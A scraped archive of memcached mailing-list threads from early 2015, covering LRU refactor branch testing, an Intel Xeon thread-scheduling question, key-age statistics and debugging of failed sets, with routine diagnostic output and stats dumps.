Re: Memcached odd behaviour on intel xeon E5-4610
I am running some tests using memached 1.4.22 over an Intel Xeon E5 (4 sockets with 8 core each, 2 Hyper threads per core, and 4 NUMA nodes) and running Ubuntu trusty. I compiled memcached with gcc-4.8.2 with default CFLAGS and configuration options. The problem is whenever I start memcached with odd number of server threads (3,5,7,9,11,..) everything is ok, and all threads are engaging in processing requests, the status of all threads are Running. However, if I start the server with even number of threads (2,4,6,8,..), half of the threads are always in sleep mode and do not engage in servicing clients. This is related to memached, as memaslap, for example, is running with no such pattern. I ran the exact test on an AMD Opteron and things are ok with memached. So my question is: is there any specific tuning required for Intel machines? Is there any specific flag or some part of the code that might cause worker threads to not engage? Thanks, Saman That is pretty weird. I've not run it on a quad socket but plenty of intel machines without problem. Modern ones too. How many clients are you telling memslap to use? Can you try https://github.com/dormando/mc-crusher quickly? (run loadconf/similar to load some values, then a different one to hammer it). Connections are dispersed via thread.c:dispatch_conn_new() int tid = (last_thread + 1) % settings.num_threads; LIBEVENT_THREAD *thread = threads + tid; last_thread = tid; which is pretty simple at the base. If you can gdb up can you dump the per-thread stats structures? that will show definitively if those threads ever get work or not.
Re: memory efficiency / LRU refactor branch
Can probably get rid of that since I added the juggles stat. and/or rename it to maintainer_runs or something... was useful to see if I'd hung the thread. On Tue, 20 Jan 2015, Eric McConville wrote: This is more of a comment, but I noticed when debugging w/ running the lru_maintainer option under extreme verbosity (-vvv), I get an endless running/sleeping message. ~ ./memcached -vvv -o lru_maintainer // ... slab start-up ... LRU maintainer thread running LRU maintainer thread sleeping LRU maintainer thread running LRU maintainer thread sleeping LRU maintainer thread running LRU maintainer thread sleeping // ... endless... Expected, but a bit annoying On Tue, Jan 20, 2015 at 12:37 AM, dormando dorma...@rydia.net wrote: Thanks! No crashes is interesting/useful at least? No errors or other problems? I'm still hoping someone can side-by-side in production with the recommended settings. I can come up with synthetic tests all day and it doesn't educate in the same way. On Tue, 20 Jan 2015, Zhiwei Chan wrote: test result: I run this test last night, the result as following: 1. environment: [root@jason3 code]# lsb_release -a LSB Version: :base-4.0-amd64:base-4.0-noarch:core-4.0-amd64:core-4.0-noarch:graphics-4.0-amd64:graphics-4.0-noarch:printing-4.0-amd64:printing-4.0-noarch Distributor ID: CentOS Description: CentOS release 6.5 (Final) Release: 6.5 Codename: Final [root@jason3 code]# free total used free shared buffers cached Mem: 8003888 3434536 4569352 0 263324 1372600 -/+ buffers/cache: 1798612 6205276 Swap: 8142840 11596 8131244 [root@jason3 code]# cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 58 model name : Intel(R) Xeon(R) CPU E3-1225 V2 @ 3.20GHz stepping : 9 cpu MHz : 1600.000 cache size : 8192 KB 4 core. 2. running option: [root@jason3 code]# ps -ef|grep memcached- root 7898 1 11 Jan19 ? 02:12:46 ./memcached-master -c 10240 -o tail_repair_time=7200 -m 64 -u root -p 3 -d root 8092 1 11 Jan19 ? 02:11:22 ./memcached-lrurework -d -c 10240 -o lru_maintainer lru_crawler -m 64 -u root -p 4 root 10265 9447 0 11:30 pts/1 00:00:00 grep memcached- root 10325 1 11 Jan19 ? 02:06:14 ./memcached-release -d -c 10240 -m 64 -u root -p 5 -o slab_reassign lru_crawler slab_automove=3 release_mem_sleep=1 release_mem_start=40 release_mem_stop=80 lru_crawler_interval=3600 memcached-master : the most update memcached of master branch. with port 3 memcached-lrurework: the most update lrurework branch of dormado's memcached, with port 4 memcached-release: the most update master branch + release memory path. with port 5 3. What is the traffic mode? It simulates the traffic distribution of one of our pools, with the expire-time and value-length distribution as following: #the expire of keys expire_time = [1,5,10,30,60,300,600,3600,86400,0] expire_time_weight = [1,1, 2, 5, 8, 5, 6, 5, 3,1] #the len of value value_len = [4,10,50,100,200,500,1000,2000,5000,1] value_len_weight = [3, 4, 5, 8, 8, 10, 5, 5, 2, 1] Using the the python script compare_test.pyto excute: python ./compare_test.py 192.168.116.213:3,192.168.116.213:4,192.168.116.213:5 I run the test process on the machine that run memcached process, so that it is easy to get heavy workload. I got a test result of last 12 hours, watch at Cacti. it seems that there is no different for this traffic mode. gets/sets = 9:1 hit_rate ~ 50% [IMAGE] I also print some detail statistics info in the test script: Cache list: ['192.168.116.213:3', '192.168.116.213:4', '192.168.116.213:5'] send_key_number: 127306 ---unique keys number test_loop: 0 ---loop forever, no limit weight of get/set command: [10, 1] -- the weight of get/set command. Note: if get a key miss, it will set the key immediately, not count into this weight. show_interval: 10 ---the interval of showing statistics info. stats_interval: 5 ---the interval of getting the stats of memcached. show_stats_interval:[60, 3600, 43200] ---the time-range of showing in second. e.g. 60 means last 60s, and 3600 means last 3600s len of keys: [4, 10, 50, 100, 200, 500, 1000, 2000, 5000, 1] possible
Re: memory efficiency / LRU refactor branch
: 12405356058, OOMs: 0, evict: 359460 192.168.116.213:5 [60s] gets: 523093, hit: 49%, updates: 52116, dels: 0, items: 28/69396, read: 52993446, write: 215231210, OOMs: 0, evict: 6491 [3600s] gets: 29669464, hit: 49%, updates: 2961988, dels: 0, items: -25/69396, read: 3038356827, write: 12219764097, OOMs: 0, evict: 355644 ... On Fri, Jan 16, 2015 at 9:29 PM, Zhiwei Chan z.w.chan.ja...@gmail.com wrote: Our maintain team trend to be conservative, especially on the basic software relative to performance. so I think it is rare possible to post it to the production recently. But I write a pretty convenient tools in Python for an A/B test. The tool can fake traffic of random expire-time and random length, and also can specify the weights of different expire-time and length, and lots of other functions. It is almost completed, and I can post a result next Monday. On Fri, Jan 16, 2015 at 11:12 AM, dormando dorma...@rydia.net wrote: If you want? What would make you confident enough to try the branch in production? Or do you rely on your other patches and that's not really possible? On Thu, 15 Jan 2015, Zhiwei Chan wrote: I try to use real traffic of application to make a compare test, but it seems that not all of guys use the cache-client with consistent hash in dev environment. The result is that the traffic is not distributed well as I supposed. Should I fake the traffic and make a compare test instead of real traffic? e.g., fake the random expire-time keys traffic to set and get for memcached. --- host mc56 installs the most update LRU-rework branch's memcached with option likes /usr/local/bin/memcached -u nobody -d -c 10240 -o lru_maintainer lru_crawler -m 64 -p 11811; host mc57 install the version 1.4.20_7_gb118a6c's memcached, with option likes /usr/bin/memcached -u nobody -d -c 10240 -o tail_repair_time=7200 -m 64 -p 11811, I sum up the stats of all memcache instances on the host and make followings analysis: Inline image 1 On Wed, Jan 14, 2015 at 1:58 AM, dormando dorma...@rydia.net wrote: Last update to the branch was 3 days ago. I'm not planning on doing any more work on it at the moment, so people have a chance to test it. thanks! On Tue, 13 Jan 2015, Zhiwei Chan wrote: I compile directly using your branch on the test server, and please tell me if it need update and re-compile. On Tue, Jan 13, 2015 at 4:20 AM, dormando dorma...@rydia.net wrote: That sounds like an okay place to start. Can you please make sure the other dev server is running the very latest version of the branch? A lot changed since last friday... a few pretty bad bugs. Please use the startup options described in the middle of the PR. If anyone's brave enough to try the latest branch on one production instance (if they have a low traffic one somewhere, maybe?) that'd be good. I ran the branch under a load tester for a few hours, it passes tests, etc. If I merge it, it'll just go into people's productions without ever having a production test first, so hopefully someone can try it? thanks On Mon, 12 Jan 2015, Zhiwei Chan wrote: I have run it since last Friday, so far no crash. As I have finished the haproxy works today, I will try a compare test for this LRU works tomorrow as following: There are two servers(Centos 5.8, 8cores, 8G memory) in the dev environment, Both of server run 32 memcached instances(processes) with maxmum memory of 128M. One server runs version 1.4.21, the other runs this branch. There are lots of pools using these memcached server, and all of pools use tow memcached instances on different server. The client of pools use Consistent Hash algorithm to distribute keys to their 2 memcached instances. I will watch the hit-rate and other performance using Cacti. I think it will work, but usually there is not much traffic in our dev environment. Please tell me if any other advice. 2015-01-08 4:21 GMT+08
Re: memory efficiency / LRU refactor branch
If you want? What would make you confident enough to try the branch in production? Or do you rely on your other patches and that's not really possible? On Thu, 15 Jan 2015, Zhiwei Chan wrote: I try to use real traffic of application to make a compare test, but it seems that not all of guys use the cache-client with consistent hash in dev environment. The result is that the traffic is not distributed well as I supposed. Should I fake the traffic and make a compare test instead of real traffic? e.g., fake the random expire-time keys traffic to set and get for memcached. --- host mc56 installs the most update LRU-rework branch's memcached with option likes /usr/local/bin/memcached -u nobody -d -c 10240 -o lru_maintainer lru_crawler -m 64 -p 11811; host mc57 install the version 1.4.20_7_gb118a6c's memcached, with option likes /usr/bin/memcached -u nobody -d -c 10240 -o tail_repair_time=7200 -m 64 -p 11811, I sum up the stats of all memcache instances on the host and make followings analysis: Inline image 1 On Wed, Jan 14, 2015 at 1:58 AM, dormando dorma...@rydia.net wrote: Last update to the branch was 3 days ago. I'm not planning on doing any more work on it at the moment, so people have a chance to test it. thanks! On Tue, 13 Jan 2015, Zhiwei Chan wrote: I compile directly using your branch on the test server, and please tell me if it need update and re-compile. On Tue, Jan 13, 2015 at 4:20 AM, dormando dorma...@rydia.net wrote: That sounds like an okay place to start. Can you please make sure the other dev server is running the very latest version of the branch? A lot changed since last friday... a few pretty bad bugs. Please use the startup options described in the middle of the PR. If anyone's brave enough to try the latest branch on one production instance (if they have a low traffic one somewhere, maybe?) that'd be good. I ran the branch under a load tester for a few hours, it passes tests, etc. If I merge it, it'll just go into people's productions without ever having a production test first, so hopefully someone can try it? thanks On Mon, 12 Jan 2015, Zhiwei Chan wrote: I have run it since last Friday, so far no crash. As I have finished the haproxy works today, I will try a compare test for this LRU works tomorrow as following: There are two servers(Centos 5.8, 8cores, 8G memory) in the dev environment, Both of server run 32 memcached instances(processes) with maxmum memory of 128M. One server runs version 1.4.21, the other runs this branch. There are lots of pools using these memcached server, and all of pools use tow memcached instances on different server. The client of pools use Consistent Hash algorithm to distribute keys to their 2 memcached instances. I will watch the hit-rate and other performance using Cacti. I think it will work, but usually there is not much traffic in our dev environment. Please tell me if any other advice. 2015-01-08 4:21 GMT+08:00 dormando dorma...@rydia.net: Hey, To all three of you: Just run it anywhere you can (but not more than one machine, yet?), with the options prescribed in the PR. Ideally you have graphs of the hit ratio and maybe cache fullness and can compare before/after. And let me know if it hangs or crashes, obviously. If so a backtrace and/or coredump would be fantastic. On Thu, 8 Jan 2015, Zhiwei Chan wrote: I will deploy it to one of our test environment on CentOS 5.8, for a comparison test with the 1.4.21, although the workloads is not as heavy as product environment. Tell me if any I could help. 2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com: Same here. Do you want any findings posted to the mailing list, or the PU thread? On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com wrote: I'm willing to help out in any way possible. What can I do? -Original Message- From: memcached@googlegroups.com [mailto:memcached
Re: memory efficiency / LRU refactor branch
Last update to the branch was 3 days ago. I'm not planning on doing any more work on it at the moment, so people have a chance to test it. thanks! On Tue, 13 Jan 2015, Zhiwei Chan wrote: I compile directly using your branch on the test server, and please tell me if it need update and re-compile. On Tue, Jan 13, 2015 at 4:20 AM, dormando dorma...@rydia.net wrote: That sounds like an okay place to start. Can you please make sure the other dev server is running the very latest version of the branch? A lot changed since last friday... a few pretty bad bugs. Please use the startup options described in the middle of the PR. If anyone's brave enough to try the latest branch on one production instance (if they have a low traffic one somewhere, maybe?) that'd be good. I ran the branch under a load tester for a few hours, it passes tests, etc. If I merge it, it'll just go into people's productions without ever having a production test first, so hopefully someone can try it? thanks On Mon, 12 Jan 2015, Zhiwei Chan wrote: I have run it since last Friday, so far no crash. As I have finished the haproxy works today, I will try a compare test for this LRU works tomorrow as following: There are two servers(Centos 5.8, 8cores, 8G memory) in the dev environment, Both of server run 32 memcached instances(processes) with maxmum memory of 128M. One server runs version 1.4.21, the other runs this branch. There are lots of pools using these memcached server, and all of pools use tow memcached instances on different server. The client of pools use Consistent Hash algorithm to distribute keys to their 2 memcached instances. I will watch the hit-rate and other performance using Cacti. I think it will work, but usually there is not much traffic in our dev environment. Please tell me if any other advice. 2015-01-08 4:21 GMT+08:00 dormando dorma...@rydia.net: Hey, To all three of you: Just run it anywhere you can (but not more than one machine, yet?), with the options prescribed in the PR. Ideally you have graphs of the hit ratio and maybe cache fullness and can compare before/after. And let me know if it hangs or crashes, obviously. If so a backtrace and/or coredump would be fantastic. On Thu, 8 Jan 2015, Zhiwei Chan wrote: I will deploy it to one of our test environment on CentOS 5.8, for a comparison test with the 1.4.21, although the workloads is not as heavy as product environment. Tell me if any I could help. 2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com: Same here. Do you want any findings posted to the mailing list, or the PU thread? On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com wrote: I'm willing to help out in any way possible. What can I do? -Original Message- From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] On Behalf Of dormando Sent: Wednesday, January 7, 2015 3:52 AM To: memcached@googlegroups.com Subject: memory efficiency / LRU refactor branch Yo, https://github.com/memcached/memcached/pull/97 Opening to a wider audience. I need some folks willing to poke at it and see if their workloads fair better or worse with respect to hit ratios. The rest of the work remaining on my end is more testing, and some TODO's noted in the PR. The remaining work is relatively small aside from the page mover idea. It hasn't been crashing or hanging in my testing so far, but that might still happen. I can't/won't merge this until I get some evidence that it's useful. Hoping someone out there can lend a hand. I don't know what the actual impact would be, but for some workloads it could be large. Even for folks who have set all items to never expire, it could still potentially improve hit ratios by better protecting active items. It will work best if you at least have a mix of items with TTL's that expire in reasonable amounts of time. thanks
Re: Is there a where to work out when the key was written to memcache and calculate the age of the oldest key on our memcache?
The only data stored are when the item expires, and when the last time it was accessed. The age field (and evicted_time) is how long ago the oldest item in the LRU was accessed. You can roughly tell how wide your LRU is with that. On Mon, 12 Jan 2015, 'Jay Grizzard' via memcached wrote: I don’t think there’s a way to figure out when a given key was written. If you really needed that, you could write it as part of the data you stored, or use the ‘flags’ field to store a unixtime timestamp. You can get the age of the oldest key, on a per-slab basis, with ‘stats items’ and looking at the ‘age’ field. If you want the overall oldest age, you’ll have to find the oldest age value amongst all the slabs. Do note, though, that if you have evictions going on, ‘oldest’ is kind of dubious, if you’re trying to use it as a “anything newer than this exists”, since evictions happen in lru order and per-slab, so younger items can disappear before older ones, if they’re in a different slab or have been accessed more recently. (Don’t know if that’s what you’re doing, but just in case you are…) -j On Mon, Jan 12, 2015 at 9:34 AM, Gurdipe Dosanjh gurd...@veeqo.com wrote: Hi All, I am new to memcache and need to know is there a where to work out when the key was written to memcache and calculate the age of the oldest key on our memcache? Kind Regards Gurdipe -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: memory efficiency / LRU refactor branch
That sounds like an okay place to start. Can you please make sure the other dev server is running the very latest version of the branch? A lot changed since last friday... a few pretty bad bugs. Please use the startup options described in the middle of the PR. If anyone's brave enough to try the latest branch on one production instance (if they have a low traffic one somewhere, maybe?) that'd be good. I ran the branch under a load tester for a few hours, it passes tests, etc. If I merge it, it'll just go into people's productions without ever having a production test first, so hopefully someone can try it? thanks On Mon, 12 Jan 2015, Zhiwei Chan wrote: I have run it since last Friday, so far no crash. As I have finished the haproxy works today, I will try a compare test for this LRU works tomorrow as following: There are two servers(Centos 5.8, 8cores, 8G memory) in the dev environment, Both of server run 32 memcached instances(processes) with maxmum memory of 128M. One server runs version 1.4.21, the other runs this branch. There are lots of pools using these memcached server, and all of pools use tow memcached instances on different server. The client of pools use Consistent Hash algorithm to distribute keys to their 2 memcached instances. I will watch the hit-rate and other performance using Cacti. I think it will work, but usually there is not much traffic in our dev environment. Please tell me if any other advice. 2015-01-08 4:21 GMT+08:00 dormando dorma...@rydia.net: Hey, To all three of you: Just run it anywhere you can (but not more than one machine, yet?), with the options prescribed in the PR. Ideally you have graphs of the hit ratio and maybe cache fullness and can compare before/after. And let me know if it hangs or crashes, obviously. If so a backtrace and/or coredump would be fantastic. On Thu, 8 Jan 2015, Zhiwei Chan wrote: I will deploy it to one of our test environment on CentOS 5.8, for a comparison test with the 1.4.21, although the workloads is not as heavy as product environment. Tell me if any I could help. 2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com: Same here. Do you want any findings posted to the mailing list, or the PU thread? On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com wrote: I'm willing to help out in any way possible. What can I do? -Original Message- From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] On Behalf Of dormando Sent: Wednesday, January 7, 2015 3:52 AM To: memcached@googlegroups.com Subject: memory efficiency / LRU refactor branch Yo, https://github.com/memcached/memcached/pull/97 Opening to a wider audience. I need some folks willing to poke at it and see if their workloads fair better or worse with respect to hit ratios. The rest of the work remaining on my end is more testing, and some TODO's noted in the PR. The remaining work is relatively small aside from the page mover idea. It hasn't been crashing or hanging in my testing so far, but that might still happen. I can't/won't merge this until I get some evidence that it's useful. Hoping someone out there can lend a hand. I don't know what the actual impact would be, but for some workloads it could be large. Even for folks who have set all items to never expire, it could still potentially improve hit ratios by better protecting active items. It will work best if you at least have a mix of items with TTL's that expire in reasonable amounts of time. thanks, -Dormando -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails
Re: memory efficiency / LRU refactor branch
Hi, https://github.com/memcached/memcached/pull/97 I've been poking at the TODO list since originally posting and fixed a number of bugs. I'm taking some extra time to think about the slab rebalancer situation and will be doing more testing than coding from now on. Hoping to get some of you folks involved in testing. I'll give it a good soak before merging. Please and thanks! On Wed, 7 Jan 2015, dormando wrote: Hey, To all three of you: Just run it anywhere you can (but not more than one machine, yet?), with the options prescribed in the PR. Ideally you have graphs of the hit ratio and maybe cache fullness and can compare before/after. And let me know if it hangs or crashes, obviously. If so a backtrace and/or coredump would be fantastic. On Thu, 8 Jan 2015, Zhiwei Chan wrote: I will deploy it to one of our test environment on CentOS 5.8, for a comparison test with the 1.4.21, although the workloads is not as heavy as product environment. Tell me if any I could help. 2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com: Same here. Do you want any findings posted to the mailing list, or the PU thread? On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com wrote: I'm willing to help out in any way possible. What can I do? -Original Message- From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] On Behalf Of dormando Sent: Wednesday, January 7, 2015 3:52 AM To: memcached@googlegroups.com Subject: memory efficiency / LRU refactor branch Yo, https://github.com/memcached/memcached/pull/97 Opening to a wider audience. I need some folks willing to poke at it and see if their workloads fair better or worse with respect to hit ratios. The rest of the work remaining on my end is more testing, and some TODO's noted in the PR. The remaining work is relatively small aside from the page mover idea. It hasn't been crashing or hanging in my testing so far, but that might still happen. I can't/won't merge this until I get some evidence that it's useful. Hoping someone out there can lend a hand. I don't know what the actual impact would be, but for some workloads it could be large. Even for folks who have set all items to never expire, it could still potentially improve hit ratios by better protecting active items. It will work best if you at least have a mix of items with TTL's that expire in reasonable amounts of time. thanks, -Dormando -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
RE: memory efficiency / LRU refactor branch
The latest commits document the new statistics counters. If there're other that might be interesting let me know. Mainly to compare before/after you only really need to look at the hit ratio. If your dataset is large enough to push items through cache, this is where the improvements start. Otherwise uh... if it actually functions that's good to know an generally obvious to monitor (non-corrupt data, doesn't crash). On Thu, 8 Jan 2015, Ryan McCullagh wrote: Hi, I'm going to be using your lru_rework branch on my development machines starting tonight. I'm looking for some ways to monitor it? -Original Message- From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] On Behalf Of dormando Sent: Thursday, January 8, 2015 9:25 PM To: memcached@googlegroups.com Subject: Re: memory efficiency / LRU refactor branch Hi, https://github.com/memcached/memcached/pull/97 I've been poking at the TODO list since originally posting and fixed a number of bugs. I'm taking some extra time to think about the slab rebalancer situation and will be doing more testing than coding from now on. Hoping to get some of you folks involved in testing. I'll give it a good soak before merging. Please and thanks! On Wed, 7 Jan 2015, dormando wrote: Hey, To all three of you: Just run it anywhere you can (but not more than one machine, yet?), with the options prescribed in the PR. Ideally you have graphs of the hit ratio and maybe cache fullness and can compare before/after. And let me know if it hangs or crashes, obviously. If so a backtrace and/or coredump would be fantastic. On Thu, 8 Jan 2015, Zhiwei Chan wrote: I will deploy it to one of our test environment on CentOS 5.8, for a comparison test with the 1.4.21, although the workloads is not as heavy as product environment. Tell me if any I could help. 2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com: Same here. Do you want any findings posted to the mailing list, or the PU thread? On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com wrote: I'm willing to help out in any way possible. What can I do? -Original Message- From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] On Behalf Of dormando Sent: Wednesday, January 7, 2015 3:52 AM To: memcached@googlegroups.com Subject: memory efficiency / LRU refactor branch Yo, https://github.com/memcached/memcached/pull/97 Opening to a wider audience. I need some folks willing to poke at it and see if their workloads fair better or worse with respect to hit ratios. The rest of the work remaining on my end is more testing, and some TODO's noted in the PR. The remaining work is relatively small aside from the page mover idea. It hasn't been crashing or hanging in my testing so far, but that might still happen. I can't/won't merge this until I get some evidence that it's useful. Hoping someone out there can lend a hand. I don't know what the actual impact would be, but for some workloads it could be large. Even for folks who have set all items to never expire, it could still potentially improve hit ratios by better protecting active items. It will work best if you at least have a mix of items with TTL's that expire in reasonable amounts of time. thanks, -Dormando -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
memory efficiency / LRU refactor branch
Yo, https://github.com/memcached/memcached/pull/97 Opening to a wider audience. I need some folks willing to poke at it and see if their workloads fair better or worse with respect to hit ratios. The rest of the work remaining on my end is more testing, and some TODO's noted in the PR. The remaining work is relatively small aside from the page mover idea. It hasn't been crashing or hanging in my testing so far, but that might still happen. I can't/won't merge this until I get some evidence that it's useful. Hoping someone out there can lend a hand. I don't know what the actual impact would be, but for some workloads it could be large. Even for folks who have set all items to never expire, it could still potentially improve hit ratios by better protecting active items. It will work best if you at least have a mix of items with TTL's that expire in reasonable amounts of time. thanks, -Dormando
Re: memory efficiency / LRU refactor branch
To be extra clear; you can send feeback here or the PR. I don't care either way. On Wed, 7 Jan 2015, dormando wrote: Hey, To all three of you: Just run it anywhere you can (but not more than one machine, yet?), with the options prescribed in the PR. Ideally you have graphs of the hit ratio and maybe cache fullness and can compare before/after. And let me know if it hangs or crashes, obviously. If so a backtrace and/or coredump would be fantastic. On Thu, 8 Jan 2015, Zhiwei Chan wrote: I will deploy it to one of our test environment on CentOS 5.8, for a comparison test with the 1.4.21, although the workloads is not as heavy as product environment. Tell me if any I could help. 2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com: Same here. Do you want any findings posted to the mailing list, or the PU thread? On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com wrote: I'm willing to help out in any way possible. What can I do? -Original Message- From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] On Behalf Of dormando Sent: Wednesday, January 7, 2015 3:52 AM To: memcached@googlegroups.com Subject: memory efficiency / LRU refactor branch Yo, https://github.com/memcached/memcached/pull/97 Opening to a wider audience. I need some folks willing to poke at it and see if their workloads fair better or worse with respect to hit ratios. The rest of the work remaining on my end is more testing, and some TODO's noted in the PR. The remaining work is relatively small aside from the page mover idea. It hasn't been crashing or hanging in my testing so far, but that might still happen. I can't/won't merge this until I get some evidence that it's useful. Hoping someone out there can lend a hand. I don't know what the actual impact would be, but for some workloads it could be large. Even for folks who have set all items to never expire, it could still potentially improve hit ratios by better protecting active items. It will work best if you at least have a mix of items with TTL's that expire in reasonable amounts of time. thanks, -Dormando -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: memory efficiency / LRU refactor branch
Hey, To all three of you: Just run it anywhere you can (but not more than one machine, yet?), with the options prescribed in the PR. Ideally you have graphs of the hit ratio and maybe cache fullness and can compare before/after. And let me know if it hangs or crashes, obviously. If so a backtrace and/or coredump would be fantastic. On Thu, 8 Jan 2015, Zhiwei Chan wrote: I will deploy it to one of our test environment on CentOS 5.8, for a comparison test with the 1.4.21, although the workloads is not as heavy as product environment. Tell me if any I could help. 2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com: Same here. Do you want any findings posted to the mailing list, or the PU thread? On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com wrote: I'm willing to help out in any way possible. What can I do? -Original Message- From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] On Behalf Of dormando Sent: Wednesday, January 7, 2015 3:52 AM To: memcached@googlegroups.com Subject: memory efficiency / LRU refactor branch Yo, https://github.com/memcached/memcached/pull/97 Opening to a wider audience. I need some folks willing to poke at it and see if their workloads fair better or worse with respect to hit ratios. The rest of the work remaining on my end is more testing, and some TODO's noted in the PR. The remaining work is relatively small aside from the page mover idea. It hasn't been crashing or hanging in my testing so far, but that might still happen. I can't/won't merge this until I get some evidence that it's useful. Hoping someone out there can lend a hand. I don't know what the actual impact would be, but for some workloads it could be large. Even for folks who have set all items to never expire, it could still potentially improve hit ratios by better protecting active items. It will work best if you at least have a mix of items with TTL's that expire in reasonable amounts of time. thanks, -Dormando -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
1.4.22
https://code.google.com/p/memcached/wiki/ReleaseNotes1422
Re: sets failing, nothing going over the network
You may also consider an upgrade sometime... If the conn tester doesn't pull up much, I don't know what it'd be beyond things like spaces/newlines/invalid chars sneaking in, or items being too large. that sort of thing. Cache::Memcached's error reporting is pretty terrible. I have a long list of bugs/pull reqs against it that I haven't been reviewing/merging, if any of you folks are interested in helping there. On Mon, 1 Dec 2014, Joe Steffee wrote: listen_disabled_num doesn't seem to be a likely culprit... stats STAT pid 11435 STAT uptime 4457974 STAT time 1417457018 STAT version 1.4.5 STAT pointer_size 64 STAT rusage_user 19038.393825 STAT rusage_system 42581.905202 STAT curr_connections 264 STAT total_connections 1572308 STAT connection_structures 402 STAT cmd_get 658366591 STAT cmd_set 649621925 STAT cmd_flush 0 STAT get_hits 328785935 STAT get_misses 329580656 STAT delete_misses 20884653 STAT delete_hits 100083 STAT incr_misses 2779284 STAT incr_hits 44211787 STAT decr_misses 0 STAT decr_hits 0 STAT cas_misses 0 STAT cas_hits 0 STAT cas_badval 0 STAT auth_cmds 0 STAT auth_errors 0 STAT bytes_read 12821501027510 STAT bytes_written 3338632258667 STAT limit_maxbytes 4294967296 STAT accepting_conns 1 STAT listen_disabled_num 0 STAT threads 4 STAT conn_yields 441 STAT bytes 2786601635 STAT curr_items 5046673 STAT total_items 48200778 STAT evictions 0 STAT reclaimed 30123302 END The web servers are very lightly loaded and have approximately 20GB free memory all the time. The utility showed nothing: # time ./mc_conn_tester.pl Averages: (conn: 0.00045183) (set: 0.00047043) (get: 0.00031982) real 53m25.697s user 0m17.721s sys 0m11.093s Even though we saw 14 failures during this time period. Will look more to see if this is a problem on our end On Sat, Nov 29, 2014 at 4:46 PM, dormando dorma...@rydia.net wrote: Hey, http://memcached.org/timeouts - sounds like you've already done some tcp dumping, so checking the stats as mentioned in here and running the test script a bit should illuminate things a bit. On Fri, 21 Nov 2014, kgo...@bepress.com wrote: A couple months ago, we moved our memcached nodes from a dedicated VM to having one each on our four baremetal web servers (mod_perl). Since we moved, 